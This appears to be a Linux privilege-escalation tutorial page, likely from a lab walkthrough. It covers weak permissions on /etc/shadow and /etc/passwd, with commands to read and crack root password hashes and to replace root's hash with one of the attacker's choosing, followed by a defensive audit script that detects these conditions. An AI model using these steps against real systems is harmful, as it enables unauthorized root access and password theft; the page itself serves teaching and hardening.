
Weak File Permissions

The name says it all: weak file permissions on sensitive files.

Readable /etc/shadow

Note that the /etc/shadow file on the VM is world-readable:

ls -l /etc/shadow

View the contents

cat /etc/shadow

Copy the hash from the file and crack the password using any password-cracking tool.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Then use the cracked password to gain access.

Writable /etc/shadow

Note that the /etc/shadow file on the VM is world-writable:

ls -l /etc/shadow

If it is writable, generate a new password hash with a password of your choice:

mkpasswd -m sha-512 password1234

Edit the /etc/shadow file and replace the original root user's password hash with the new hash that you generated.

Writable /etc/passwd

Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.

Step 1: Check Permissions

ls -l /etc/passwd

Step 2: Generate a new password

openssl passwd password1234

Step 3: Edit the /etc/passwd file and place the generated password hash between the first and second colon (:) of the root user's row.
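To check a host for the three conditions covered on this page, the following audit script is an added example, not part of the original page. It flags world-readable or world-writable permission bits and any /etc/passwd entry that carries a password field instead of the usual "x" placeholder. The function names are hypothetical and the sample files in demo are constructed.

```shell
#!/bin/sh
# Added audit example (not from the original page); function names are hypothetical.

# Print the "other" permission bits set on a file: "", "r", "w" or "rw".
world_bits() {
    bits=""
    [ -n "$(find "$1" -prune -perm -0004 2>/dev/null)" ] && bits="${bits}r"
    [ -n "$(find "$1" -prune -perm -0002 2>/dev/null)" ] && bits="${bits}w"
    printf '%s' "$bits"
}

# List accounts in a passwd-format file whose second field is not "x", "*"
# or a "!"-locked entry. An embedded hash or an empty field both show up here.
inline_password_accounts() {
    awk -F: '$2 != "x" && $2 != "*" && $2 !~ /^!/ { print $1 }' "$1"
}

# Audit a passwd file and a shadow file; print one finding per line.
audit_auth_files() {
    passwd_file=$1 shadow_file=$2
    wb=$(world_bits "$shadow_file")
    case $wb in *r*) echo "HIGH $shadow_file is world-readable" ;; esac
    case $wb in *w*) echo "CRITICAL $shadow_file is world-writable" ;; esac
    case $(world_bits "$passwd_file") in *w*) echo "CRITICAL $passwd_file is world-writable" ;; esac
    for user in $(inline_password_accounts "$passwd_file"); do
        echo "HIGH $passwd_file has a password field set for $user"
    done
    return 0
}

# Constructed sample files that reproduce the three conditions on this page.
demo() {
    dir=$(mktemp -d) || return 1
    printf 'root:CONSTRUCTED_HASH:0:0:root:/root:/bin/bash\ndaemon:x:1:1::/:/usr/sbin/nologin\n' > "$dir/passwd"
    printf 'root:CONSTRUCTED_HASH:19000:0:99999:7:::\n' > "$dir/shadow"
    chmod 666 "$dir/passwd" "$dir/shadow"
    audit_auth_files "$dir/passwd" "$dir/shadow"
    rm -rf "$dir"
}
demo
```

On a real system, call audit_auth_files /etc/passwd /etc/shadow; a correctly configured host prints nothing.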


Last updated 2 years ago